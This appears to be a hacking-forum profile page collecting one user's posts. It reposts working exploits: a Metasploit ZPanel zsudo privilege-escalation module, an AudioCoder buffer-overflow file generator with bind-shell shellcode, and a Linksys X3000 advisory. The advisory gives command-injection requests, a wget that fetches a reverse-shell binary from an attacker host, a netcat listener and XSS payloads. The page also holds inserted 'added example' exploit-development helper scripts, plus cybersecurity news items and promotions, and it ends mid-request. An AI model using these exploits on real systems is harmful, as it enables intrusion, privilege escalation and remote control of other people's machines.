Matt
Active Members
Posts: 1773
Days Won: 6

Everything posted by Matt

  1. Author : metasploit
     Source : ZPanel zsudo Local Privilege Escalation Exploit
     Code :

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/exploit/exe'

class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Common

  def initialize(info={})
    super( update_info( info, {
        'Name'           => 'ZPanel zsudo Local Privilege Escalation Exploit',
        'Description'    => %q{
          This module abuses the zsudo binary, installed with zpanel, to escalate
          privileges. In order to work, a session with access to zsudo on the sudoers
          configuration is needed. This module is useful for post exploitation of
          ZPanel vulnerabilities, where typically web server privileges are acquired,
          and this user is allowed to execute zsudo on the sudoers file.
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'sinn3r',
            'juan vazquez'
          ],
        'DisclosureDate' => 'Jun 07 2013',
        'Platform'       => [ 'unix', 'linux'],
        'Arch'           => [ ARCH_CMD, ARCH_X86 ],
        'SessionTypes'   => [ 'shell', 'meterpreter' ],
        'Targets'        =>
          [
            [ 'Command payload', { 'Arch' => ARCH_CMD } ],
            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ]
          ],
        'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
        'DefaultTarget'  => 0,
      }
    ))

    register_options([
      # These are not OptPath because it's a *remote* path
      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
      OptString.new("zsudo", [ true, "Path to zsudo executable", "/etc/zpanel/panel/bin/zsudo" ]),
    ], self.class)
  end

  def check
    if file?(datastore["zsudo"])
      return CheckCode::Detected
    end
    return CheckCode::Unknown
  end

  def exploit
    if (target.arch.include? ARCH_CMD)
      exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.sh"
      # Using this way of writing the payload to avoid issues when failing to find
      # a command on the victim for writing binary data
      cmd_exec "echo \"#{payload.encoded.gsub(/"/, "\\\"")}\" > #{exe_file}"
    else
      exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
      write_file(exe_file, generate_payload_exe)
    end

    cmd_exec "chmod +x #{exe_file}"

    print_status("Running...")
    begin
      # zsudo runs the dropped payload; the trailing random argument is a dummy
      cmd_exec "#{datastore["zsudo"]} #{exe_file} #{rand_text_alpha(3 + rand(5))}"
    ensure
      cmd_exec "rm -f #{exe_file}"
    end
  end
end
```
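As an added example (not part of the Metasploit module above, nor ZPanel's own code), here is a Python audit of the precondition the module's description states: a web-server user who is allowed to run zsudo through sudoers. It parses `sudo -l` output for NOPASSWD rules naming the binary and checks the setuid bit on the file. The path defaults to the module's `zsudo` option; the sample `sudo -l` text is constructed for the demonstration and the rule-line regex is an assumption about sudo's output format.

```python
"""Audit the precondition the zsudo module relies on.

Added example, not part of the Metasploit module or of ZPanel. Two checks
on a Linux host: whether the zsudo binary carries the setuid bit, and whether
`sudo -l` for the calling user lists a NOPASSWD rule naming it. ZSUDO_PATH
mirrors the module's default "zsudo" option.
"""
import os
import re
import stat
import subprocess

ZSUDO_PATH = "/etc/zpanel/panel/bin/zsudo"

# One rule line of `sudo -l` output, e.g. "    (ALL) NOPASSWD: /path/a, /path/b".
# Lines that do not start with "(runas)" (defaults, headings) are ignored.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def nopasswd_grants(sudo_l_output, binary=ZSUDO_PATH):
    """Return (runas, command) pairs from `sudo -l` text that let the caller
    run `binary` without a password (alone or with fixed arguments)."""
    grants = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m or "NOPASSWD:" not in m.group("tags"):
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd == binary or cmd.startswith(binary + " "):
                grants.append((m.group("runas"), cmd))
    return grants


def is_setuid(path):
    """True when `path` exists and has the setuid bit (mode 4xxx) set."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return bool(st.st_mode & stat.S_ISUID)


def audit(binary=ZSUDO_PATH):
    """Run the live checks on this host; return a list of finding strings."""
    findings = []
    if is_setuid(binary):
        mode = oct(os.stat(binary).st_mode & 0o7777)
        findings.append(f"{binary} is setuid (mode {mode})")
    # -n makes sudo fail instead of prompting when a password would be needed,
    # so the script never blocks waiting on a terminal.
    try:
        proc = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True)
    except FileNotFoundError:
        return findings
    for runas, cmd in nopasswd_grants(proc.stdout, binary):
        findings.append(f"sudo lets this user run '{cmd}' as ({runas}) with NOPASSWD")
    return findings


# Constructed sample shaped like `sudo -l` output on an affected host.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on this host:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: /etc/zpanel/panel/bin/zsudo
    (root) /usr/bin/less
"""

if __name__ == "__main__":
    print("sample grants:", nopasswd_grants(SAMPLE_SUDO_L))
    for finding in audit():
        print("FINDING:", finding)
```

Run it as the web-server user on the target (or from the session the module would use); either finding means the module's `check` result of "Detected" is backed by a real path to root.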
  2. Author : Onying
     Source : AudioCoder 0.8.22 (.lst) - Direct Retn Buffer Overflow
     Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/a3b972bf42615e5c34edb19b62eb3fc4-AudioCoder-0.8.22.5506.exe
     Code :

```python
#!/usr/bin/python
# Title: AudioCoder 0.8.22 [.lst] - Direct Retn Buffer OverFlow
# version: 0.8.22 build 5506 (built on May 27 2013, 00:22:49)
# link: http://www.downloadbestsoft-mirror2.com/programs/AudioCoder-0.8.22.5506.exe
# Platform: Windows XP sp3
# Date: June 23rd, 2013
# Author: onying (@onyiing)
# Blog : http://itsecuritynewbie.blogspot.com/
# Thanks to: Information Security Shinobi Camp | http://www.is2c-dojo.com
#
# Python 2 script: the str literals below are raw bytes written as-is.

header = "http://"
junk = "\x41" * 249              # filler up to the saved return address
junk += "\x53\x93\x42\x7E"       # return address overwrite (direct RET)
junk += "\x90" * 16              # NOP sled into the shellcode

# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNai
junk += ("\xb8\xe2\x59\x26\xe6\x33\xc9\xda\xdd\xb1\x51\xd9\x74\x24\xf4\x5e"
"\x31\x46\x10\x83\xc6\x04\x03\xa4\x55\xc4\x13\xd4\x0c\xe3\x91\xcc"
"\x28\x0c\xd6\xf3\xab\x78\x45\x2f\x08\xf4\xd3\x13\xdb\x76\xd9\x13"
"\xda\x69\x6a\xac\xc4\xfe\x32\x12\xf4\xeb\x84\xd9\xc2\x60\x17\x33"
"\x1b\xb7\x81\x67\xd8\xf7\xc6\x70\x20\x3d\x2b\x7f\x60\x29\xc0\x44"
"\x30\x8a\x01\xcf\x5d\x59\x0e\x0b\x9f\xb5\xd7\xd8\x93\x02\x93\x81"
"\xb7\x95\x48\x3e\xe4\x1e\x07\x2c\xd0\x3c\x79\x6f\x29\xe6\x1d\xe4"
"\x09\x28\x55\xba\x81\xc3\x19\x26\x37\x58\x99\x5e\x19\x37\x94\x10"
"\xab\x2b\xf8\x53\x65\xd5\xaa\xcd\xe2\x29\x7f\x79\x84\x3e\x4d\x26"
"\x3e\x3e\x61\xb0\x75\x2d\x7e\x7b\xda\x51\xa9\x24\x53\x48\x30\x5b"
"\x8e\x9b\xbf\x0e\x3b\x9e\x40\x60\xd3\x47\xb7\x75\x89\x2f\x37\xa3"
"\x81\x9c\x94\x18\x75\x60\x48\xdd\x2a\x99\xbe\x87\xa4\x74\x63\x21"
"\x66\xfe\x7a\x38\xe0\xa4\x67\x32\x36\xf3\x68\x64\xd2\xec\xc7\xdd"
"\xdc\xdd\x80\x79\x8f\xf0\xb9\xd6\x2f\xda\x69\x8d\x30\x33\xe5\xc8"
"\x86\x32\xbf\x45\xe6\xed\x10\x3d\x4c\x47\x6e\x6d\xff\x0f\x77\xf4"
"\xc6\xa9\x20\xf9\x11\x1c\x30\xd5\xf8\xf5\xaa\xb3\x6c\x69\x5e\xb2"
"\x88\x07\xf0\x9d\x7b\x14\x79\xfa\x16\xe0\xf3\xe6\xd6\x28\xf0\x4c"
"\xe6\xeb\xda\x6e\x55\xc0\xb7\x03\x20\x20\x13\xb0\x7e\x38\x11\x38"
"\x33\xaf\x2a\xb1\x70\x2f\x02\x62\x2e\x9d\xfa\xc5\x81\x4b\xfc\xb4"
"\x70\xd9\xaf\xc9\xa3\x89\xe2\xec\x41\x84\xae\xf1\x9c\x72\xae\xf2"
"\x16\x7c\x80\x87\x0e\x7e\xa2\x53\xd4\x81\x73\x09\xea\xae\x14\xd3"
"\xcc\xad\x96\x78\x12\xe7\xa6\xae")

file = open("audiocoder.lst", "w")
file.write(header + junk)
file.close()
```
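As an added example (not part of the AudioCoder exploit above), the following Python shows where the two magic numbers in that script come from: the 249-byte filler and the 4-byte return address are found by crashing the target with a non-repeating pattern and reading the dword that lands in EIP. It re-implements the Metasploit-style cyclic pattern (pattern_create / pattern_offset) and, so the search runs offline, a hypothetical `.lst` reader that emulates the crash. That emulated reader is an assumption standing in for the real bug, not AudioCoder's code; the only things taken from the exploit are its layout (header, filler, RET, NOP sled, shellcode) and its RET value 0x7E429353.

```python
"""Find the return-address offset behind a direct-RET stack overflow.

Added example, not part of the AudioCoder exploit. Re-implements the cyclic
pattern technique and an emulated crash so the offset search is repeatable
without the target. The emulated reader is an assumption, not the real parser.
"""
import string
import struct


def pattern_create(length):
    """Cyclic pattern of `length` chars built from Upper+lower+digit triplets,
    so every 4-char window is unique up to 20280 chars (26*26*10 triplets)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=20280):
    """Offset of a 4-char (or longer) sequence in the pattern. `value` may be
    the characters themselves or the little-endian dword a debugger reports in
    EIP (e.g. 0x41336941 for 'Ai3A')."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("latin-1")
    return pattern_create(length).find(value)


def emulated_crash_eip(line, ret_offset=256):
    """Hypothetical .lst reader (assumption, not the real parser): it copies
    one playlist line into a fixed stack buffer whose saved return address sits
    `ret_offset` bytes from the start of the line. Returns the dword that
    overwrites EIP, or None when the line is too short to reach it."""
    if len(line) < ret_offset + 4:
        return None
    return struct.unpack("<I", line[ret_offset:ret_offset + 4].encode("latin-1"))[0]


def find_filler_length(header="http://", probe_len=400):
    """Crash the emulated reader with header+pattern and recover how many
    filler bytes precede the return address: the number the exploit pads with."""
    eip = emulated_crash_eip(header + pattern_create(probe_len))
    if eip is None:
        return None
    return pattern_offset(eip)


def build_line(ret, shellcode, header="http://", filler_len=None, nops=16):
    """Lay out one exploit line with the exploit's structure: header, filler,
    4-byte little-endian RET, NOP sled, shellcode. `ret` is an int address;
    `shellcode` is a str of latin-1 bytes."""
    if filler_len is None:
        filler_len = find_filler_length(header)
    return (header + "A" * filler_len + struct.pack("<I", ret).decode("latin-1")
            + "\x90" * nops + shellcode)


if __name__ == "__main__":
    print("filler length:", find_filler_length())           # 249
    line = build_line(0x7E429353, "\xcc" * 4)                 # int3 x4 as a stand-in payload
    print("EIP on crash:", hex(emulated_crash_eip(line)))    # 0x7e429353
```

Against the real target the workflow is the same, with the emulated step replaced by the debugger: write `header + pattern_create(400)` to a `.lst`, open it in AudioCoder, read EIP at the crash, and feed that dword to `pattern_offset`.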
  3. China on Thursday accused the United States of "double standards" and hypocrisy in the field of cyber security, amid escalating tensions between Beijing and Washington over the flight of former American IT specialist Edward Snowden, who is accused of espionage by Washington. This new reaction from China comes two days after Beijing rejected US accusations that it helped Snowden, charged with espionage in the US, escape indictment by allowing him to leave Hong Kong, Reuters reports. Cyber security is a sensitive topic in the relationship between China and the US and was one of the main subjects on the agenda of the first summit between presidents Xi Jinping and Barack Obama this month. Snowden's revelations about the US National Security Agency's intrusion into China and Hong Kong gave Beijing considerable ammunition in the "an eye for an eye, a tooth for a tooth" exchange between the two countries, Reuters notes. China's Ministry of Defense said the PRISM program "revealed the true face and hypocritical conduct of the country in question", without naming the country. Documents taken by Snowden showed that the National Security Agency has access to large amounts of online data such as e-mails, chat rooms and video recordings from large companies, including Facebook and Google, under the government program known as PRISM. "On the one hand, it seeks the advantages of the improper and selfish use of information technology and, on the other hand, it makes baseless accusations against other countries," Chinese Ministry of Defense spokesman Yang Yujun told the press, according to the national news agency Xinhua. "This 'double standards' approach is not conducive to peace and security in cyberspace," he said.
China stated that it is deeply concerned by Snowden's claims that the United States illegally penetrated numerous internet networks in Hong Kong and China, including that of Tsinghua University, which hosts one of the country's main internet hubs, as well as Chinese mobile phone networks. Beijing said it had discussed the matter with Washington. Snowden has requested asylum in Ecuador and is currently believed to be in transit at a Moscow airport, having flown out of Hong Kong on Sunday. Source: Business24.Ro
  4. US and European authorities, including those in Romania, announced on Wednesday the shutdown, in a joint operation, of 328 online shopping sites that were selling counterfeit products, according to a joint statement. On the American side, agents of the customs and homeland security service (ed. Homeland) posed as ordinary buyers and identified no fewer than 177 sites selling counterfeit products of nine brands, including sports equipment manufacturer Nike, jeweler Tiffany and the American basketball league (NBA), AFP reports. Under the Europol banner, French, British, Belgian and Romanian authorities shut down 151 sites that fraudulently used domain names such as .eu or .fr, according to the statement.
Investigators seized over 150,000 dollars in sales proceeds
Over 150,000 dollars from the sale of these products, made through the online payment system PayPal, were also seized by investigators, according to the same source. "These partnerships (ed. between the US and Europe) are vital to catching the criminals who are duping unsuspecting consumers all over the globe," explained Mark Witzal, deputy director of the Intellectual Property Rights (IPR) Center in Washington, which coordinated the operation. Counterfeit products "harm" legitimate companies and "often" pose health and safety risks to consumers, added Rob Wainwright, also quoted in the statement. Source: Business24.Ro
  5. Queen Elizabeth II of Great Britain presented, at a reception at Buckingham Palace, a science and technology prize worth one million pounds sterling. The prize, named the Queen Elizabeth Prize for Engineering, is awarded to the authors of engineering innovations that have had a significant impact on human progress, reports the portal Allvoices.com. This time the prize was awarded to a group of people directly involved in the development of the Internet: Englishman Tim Berners-Lee, Frenchman Louis Pouzin, and Americans Robert Kahn, Vinton Cerf and Marc Andreessen. Tim Berners-Lee first developed the concept of the World Wide Web. Vinton Cerf and Robert Kahn created the TCP/IP protocol, which still underlies the transmission of information over the internet today. Louis Pouzin developed a system for labeling data, and Andreessen the world's first browser.
The Internet, used by a third of the world's population
Commercial use of the Internet began in 1995, when this concept effectively merged with the concept of the World Wide Web. Before that the network was supported by the US National Science Foundation, and from 1995 this role was fully transferred to independent network providers. Approximately 2.4 billion people, that is more than a third of the world's population, use the Internet, according to 2012 data. The ceremony at Buckingham Palace, held on Tuesday, was attended by British Prime Minister David Cameron, Deputy Prime Minister Nick Clegg, and the leader of the united opposition and Labour Party leader Ed Miliband. Source: Business24.Ro
  6. South Korea has launched what has been called the world's fastest Internet on 4G/LTE networks, with the highest data download speeds. According to SK Telecom, the LTE network allows files to be downloaded at speeds of up to 150 megabits per second, which is twice as fast as before and 10 times faster than 3G services, the BBC reports. In practice users will get speeds lower than 150 megabits per second, but a group of internet users who want to talk to each other over video chat will enjoy higher video and audio quality than ever before. Source: Business24.Ro
  7. Enough, drop the off-topic. Just wish him welcome.
  8. These days a Metin2 player = a programmer.
  9. According to the results of the study "The evolution of phishing attacks 2011-2013", carried out by Kaspersky Lab, the number of internet users who faced phishing attacks in the last 12 months rose from 19.9 million to 37.3 million, an increase of 87%. Facebook, Yahoo, Google and Amazon are among the main targets attacked by cybercriminals. The study, conducted in June 2013 using data collected by the Kaspersky Security Network cloud service, shows that what was previously a subcategory of spam has now evolved into a stand-alone cyber threat. Phishing is a form of internet fraud in which criminals create fake copies of popular sites (an e-mail service, an online banking website, a social network, etc.) to which they try to lure users. Trusting users enter their login details and passwords on these websites as they normally would, but the information ends up with the cybercriminals. They can then use the stolen personal information, bank account details or passwords to steal users' money, to send spam and malware through the compromised e-mail or social network account, or simply sell the stolen data and passwords to other criminals. For a long time phishing was seen as a subspecies of ordinary spam e-mail. However, the data collected during the research confirms that phishing attacks have reached such an advanced level that they can be considered a separate, stand-alone category. In fact, e-mail is no longer the most common delivery mechanism for these messages. For example, only 12% of the recorded phishing attacks were launched via spam e-mails.
The remaining 88% came from links to phishing pages that users reached while using a search engine, a messaging system (Skype etc.) or during ordinary computer use. During the study, Kaspersky Lab specialists compared information on phishing attacks collected by Kaspersky Security Network from over 50 million users between 1 May 2012 and 30 April 2013 against the data for the 2011-2012 period.
Main findings
Users:
• In 2012-2013, phishers launched attacks affecting on average 102,100 people worldwide every day, twice as many as in 2011-2012;
• Phishing attacks most often target users in Russia, the US, India, Vietnam and England;
• Vietnam, the US, India and Germany have the highest number of affected users, with the total number of attacks in these regions doubling compared to last year.
Attackers:
• Most servers hosting phishing pages are registered in the US, England, Germany, Russia and India;
• The number of unique attack sources, such as fraudulent sites and servers, tripled in 2012-2013;
• Over half (56%) of the identified attack sources were located in just 10 countries, which shows that attackers have a set of preferred "bases" from which they launch their attacks.
Targets:
• The services of Yahoo!, Google, Facebook and Amazon are the most frequently attacked by phishers, with 30% of all recorded incidents involving fake versions of these websites;
• Over 20% of all phishing attacks imitate the sites of banks or other financial organizations;
• American Express, PayPal, Xbox Live, Twitter and others are among the 30 most attacked websites.
"The volume and variety of phishing attacks detected during the study indicate that phishing is no longer merely one tool in the category of illegal tricks developed by criminals, but clearly constitutes a serious threat," said Nikita Shvetsov, Deputy CTO (Research) at Kaspersky Lab. "These attacks are relatively simple to organize and are proving effective, with more and more cybercriminals drawn to this type of illegal activity. The volume of phishing attacks, which according to Kaspersky Security Network almost doubled over the course of a year, is proof of this trend," Nikita Shvetsov concluded. Source: FaraVirusi.Com
  10. Bitdefender, maker of the world's best-performing antivirus solution, launches the new generation of its products, a range that adapts perfectly to the characteristics of each individual computer, for top speed and iron-clad protection of personal data. The new Bitdefender comes with innovative new functions such as the unique Photon technology, for a personalized experience and extremely fast scanning, and the Wallet function, for keeping passwords and login details completely safe. The new range also extends and develops the functions that allowed Bitdefender to win the Product of the Year title from AV-Comparatives, as well as all the other industry awards over the past year. "The aggressiveness of cyber attacks, the explosive growth of internet use and the advanced technologies used by cybercriminals increase the importance of internet security, so it was imperative to create a product better than ever. We set out to design a solution capable of adapting perfectly to each individual system, for maximum efficiency and discreet protection, while offering innovative functions and improved technologies for secure banking transactions, top protection of personal information and login details, and the fastest response to the most aggressive cyber threats," says Cătălin Coșoi, Chief Security Strategist, Bitdefender. The innovative Bitdefender Photon™ technology built into the new Bitdefender gradually discovers the software applications installed on the computer, molding itself to each PC configuration, and remembers which processes do and do not need to be monitored. The result is a smaller number of files under constant control and fewer system resources consumed to keep the system fully secure. Another new and extremely useful function is Wallet, which keeps crucial data behind an impenetrable protective shield while giving the user easy access. Although the number of internet-connected devices has grown explosively over the last 10 years, little has changed in the way people authenticate on the internet. Repeated use of the same passwords, as well as weak passwords, appear to be the main reason for leaks of important information. The Wallet function of the new Bitdefender practically frees the user from the burden of memorizing a very large number of passwords and keeps them safe. The new Bitdefender, designed for an era of heightened dangers on the internet, includes Bitdefender Antispam technology, which operates from the cloud with phenomenal accuracy and keeps unsolicited and potentially dangerous messages at bay. Bitdefender Safepay™, which has been protecting online transactions around the world since its launch a year ago, keeps sensitive transaction information safe and at the same time at hand through the Wallet function. A completely new security report also guarantees user protection by guiding users towards stronger security measures through personalized recommendations and notifications. "After the phenomenal success achieved by Bitdefender over the last two years, we are aware that experts and the public expect us to maintain our industry leadership in terms of performance. I am confident that our new generation of products will maintain this leadership and successfully meet the challenges," says Cătălin Coșoi, Chief Security Strategist, Bitdefender. The new range brings improved versions of all the functions that propelled Bitdefender to the top of the security industry over the last two years. The Autopilot module lets users play games or watch films without interruption, personal data protection on Facebook shields users from security breaches and dangerous links, the Anti-Theft module allows a mobile device to be locked, wiped or located, and Parental Control now covers all Windows environments, including Windows 8 and RT. The new Bitdefender will be available online at Antivirus Software - Bitdefender Romania. Source: FaraVirusi.Com
  11. Matt (Blog HackingTuts93)

     The V.I.P Club will become operational today. To purchase access to the V.I.P area you will have to make a donation of at least 3 euro to get 1 month of access to the V.I.P area. This is shit.
  12. G Data warns against online theft and offers tips for a safe trip
More and more tourists pack their smartphones, tablets and laptops when they go on holiday, which means they can send greetings, take photos or stay connected to daily news via the Internet. What they don't know is that inadequate protection of these devices makes them easy targets for cybercriminals. G Data warns tourists not to use free WLAN networks or manipulated computers in Internet cafes. Before making their holiday plans, Internet users should secure their devices and keep a few security tips in mind. G Data can help tourists with tips for a relaxing and safe holiday, with no unpleasant surprises. "During the holiday season, cybercriminals take advantage of the fact that users, inseparable from their mobile devices, use public Internet cafes to connect to the Internet," warns Eddy Willems, G Data Security Evangelist. "Attackers exploit insufficiently secured WLAN networks or manipulate computers in Internet cafes, so they can read all data traffic and spy on credit card information, passwords and personal data." IT security experts recommend that tourists secure their phones, tablets and laptops before going on holiday and exercise caution while away from home, so that the fun holiday 2.0 does not turn into frustration. "Before leaving on holiday, users should review the security of their mobile devices and install all available updates. Using an effective security solution is a necessity."
Moreover, Willems advises users to take precautions in case of theft or loss: "A great deal of confidential data is usually stored on mobile devices, causing major trouble if the device falls into the wrong hands. Users could equip their devices with anti-theft protection that allows remote locking or wiping of all stored data."
Nine tips for a safe holiday
Before leaving:
• Install a security application: Tourists are advised to install an effective security solution.
• Keep software up to date: Before leaving on holiday, the operating system and programs should be fully updated. This helps users close security holes that attackers could exploit.
• Enable anti-theft protection: Users should secure their devices against loss by installing a security solution that includes anti-theft protection. This allows the device to be located and locked remotely, and the stored data to be wiped. On laptops, important data on the hard disk should be encrypted, leaving criminals no chance of accessing it.
• Set up a separate e-mail account for holiday greetings: Those who want to send electronic "postcards" to friends or family should create a separate e-mail account. In the event of an attack, only this account will be compromised, and it can be deleted on returning home.
• Back up data: Before leaving, it is ideal to create a copy of all data on the devices or on other storage media.
• Note the blocking number: Tourists should write down the service number of their mobile operator or card providers. That way the card, the Internet stick or the mobile device can be blocked immediately if lost.
During the holiday:
• Avoid public WLAN networks: Using the free networks in airports, railway stations or hotels should be avoided because they often offer inadequate security. Instead, tourists can browse the Internet using UMTS cards offered by mobile operators.
• Beware of Internet cafes: Public computers are generally insufficiently secured, so tourists should avoid online banking transactions and Internet shopping sessions and should not download or save any personal data. Otherwise criminals can exploit this data and use it to send illegal offers.
• Give "pickpockets" no chance: Avoid lending mobile devices or leaving them unattended. Users should leave their devices behind when going to the hotel pool or the beach; pickpockets are on the lookout for less wary tourists. Locking the devices in the hotel room can be an option if using them is not strictly necessary.
About G DATA Software AG
G Data Software AG, headquartered in Bochum, is an innovative and rapidly expanding software company focused on IT security solutions. As an Internet security specialist and a pioneer in the field of antivirus protection, the company, founded in 1985 in Bochum, produced the first antivirus program more than 20 years ago and in 2010 celebrated 25 years of activity. G Data is among the first security software developers in the world. For more than five years, no other European security software maker has won more international awards. The product range includes security solutions for both home users and small, medium and large companies. G Data security solutions are available in more than 90 countries worldwide.
More information about the company and G Data solutions is available at International - G Data Software AG
About AV Security Software Distribution
AV Security Software Distribution is a young company, established in early 2011 to become the official distributor of G Data Software in Romania, born of the desire of young and ambitious professionals to prove that they can raise the image of a world-class brand on the Romanian market to the level it has in Germany and the rest of the world. The partnership offer includes high-quality antivirus software solutions and is addressed to resellers, system integrators and retailers. The benefits of the "Made in Germany" solutions developed by G Data are: profitability, performance, increased productivity, ease of use, and the best price-quality ratio on the market. More about the company and the distribution of G Data solutions in Romania can be found at AV Security Software Distribution - Distribuitor autorizat G Data Romania. Source: AV Security Software Distribution - Distribuitor autorizat G Data Romania
  13. Cybercriminals can now create Trojan programs based on Carberp to steal online banking credentials and other financial data
The source code of the Carberp financial malware has been published online, increasing the risk that cybercriminals will create their own variants based on it, researchers at the Russian cybercrime investigation firm Group-IB have indicated. Carberp is a Trojan used mainly to steal online banking credentials and other financial information. The malware initially targeted users in the former Soviet states, but the cybercriminals behind it have expanded operations to other regions, such as Australia. Last week, a member of the Carberp group offered to sell the malware's source code, as well as other modules, for 5,000 dollars. Group-IB researchers said at the time that the sale was probably the result of an internal conflict within the group. According to the researchers, as a result of the conflict, the program's source code, or at least a significant part of it, was published online. On Monday, Georgian security researcher Ucha Gobejishvili stated on Twitter that the Carberp source code and its bootkit module (boot rootkit) had been published. Gobejishvili published a screenshot of a forum post announcing the code leak, which contained a link to a file hosting site where the password-protected source code was said to be stored. The file has since been moved from that location, but Group-IB researchers confirmed that the publication of the code is genuine.
The archive file contained the full Carberp source code and part of the source code of the bootkit module, said Andrey Komarov, head of international projects at Group-IB, adding that he expects the archive to be shared without a password on other cybercrime forums in the coming days. This will most likely lead to the development of new Carberp variants and Carberp-based Trojans in the future, as happened with the Zeus financial malware. The source code for Zeus, one of the most popular online banking Trojans to date, was published in April 2011, a few weeks after it was put up for sale on the underground market. This made the tool freely available to anyone and enabled the development of Zeus-based Trojans such as GameOver and Ice IX. Source: Computerworld - IT news, features, blogs, tech reviews, career advice
  14. Matt (Fun stuff)

  15. Author : m-1-k-3
     Source : Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities
     Code :

Device: X3000
Vendor: Linksys

============
Vulnerable Firmware Releases:
============
Firmware Version: v1.0.03 build 001 Jun 11,2012

============
Vulnerability Overview:
============

* OS Command Injection

The vulnerability is caused by missing input validation in the ping_ip parameter and can be exploited to inject and execute arbitrary shell commands. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

* OS Command Injection - Vector 1 (1):
=> Parameter: ping_ip

Example Exploit:

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/Diagnostics.asp
Authorization: Basic XXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 194
Connection: close

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20ping%20-c%201%20192%2e168%2e1%2e147%20%3b&ping_size=&ping_times=5&traceroute_ip=

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/x3000-os-command-injection.png

=============================
To get a shell:

* 1st Request
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20wget http://192.168.178.105/mipsbe_reverse_shell.elf -O /tmp/test1%20%3b&ping_size=&ping_times=5&traceroute_ip=

=> 2nd Request: Requesting change of permissions
=> 3rd Request: Requesting execution of your payload

* Webserver is hosting Big endian MIPS Shellcode:
# ls /var/www/
mipsbe_reverse_shell.elf

* starting local listener via netcat:
# nc -vlp 4444
listening on [any] 4444 ...
192.168.178.188: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.178.105] from (UNKNOWN) [192.168.178.188] 44424
<snip>
=============================

* OS Command Injection - Vector 1 (2):
=> Parameter: Add_Account_Password

Example Exploit:

POST /apply.cgi HTTP/1.1
Host: 192.168.178.188
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.178.188/User_Properties.asp
Authorization: Basic XXX=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 444

command=device_data&cur_ipaddr=192.168.178.188&next_page=StorageAdminUserAdd1.htm&redirect_timer=1&reboot=0&data1=&next_page=&submit_button=User_Properties&submit_type=create_user&change_action=gozila_cgi&Add_Account_Group_Name=&access_group_name=&delete_groups=&Modify_Account_Name=&Add_Account_Name=pwnd&full_name=pwnd&user_desc=pwnd&Add_Account_Password=`ping%20192%2e168%2e178%2e103`&Add_Account_PasswordConfirm=pwnd&Add_Account_Group=admin

* For changing the password there is no request for the current password (3):

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

* reflected XSS

Injecting scripts into the following parameters reveals that these are not properly validated for malicious input.

=> Parameter: ping_ip (4)

POST /apply.cgi HTTP/1.1
Host: 192.168.178.188
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.178.188/Diagnostics.asp
Authorization: Basic XXX=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 156

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=1.1.1.1'><script>alert(1)</script>&ping_size=32&ping_times=5&traceroute_ip=

=> Parameter: sortby (5)

POST /apply.cgi HTTP/1.1
Host: 192.168.178.188
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
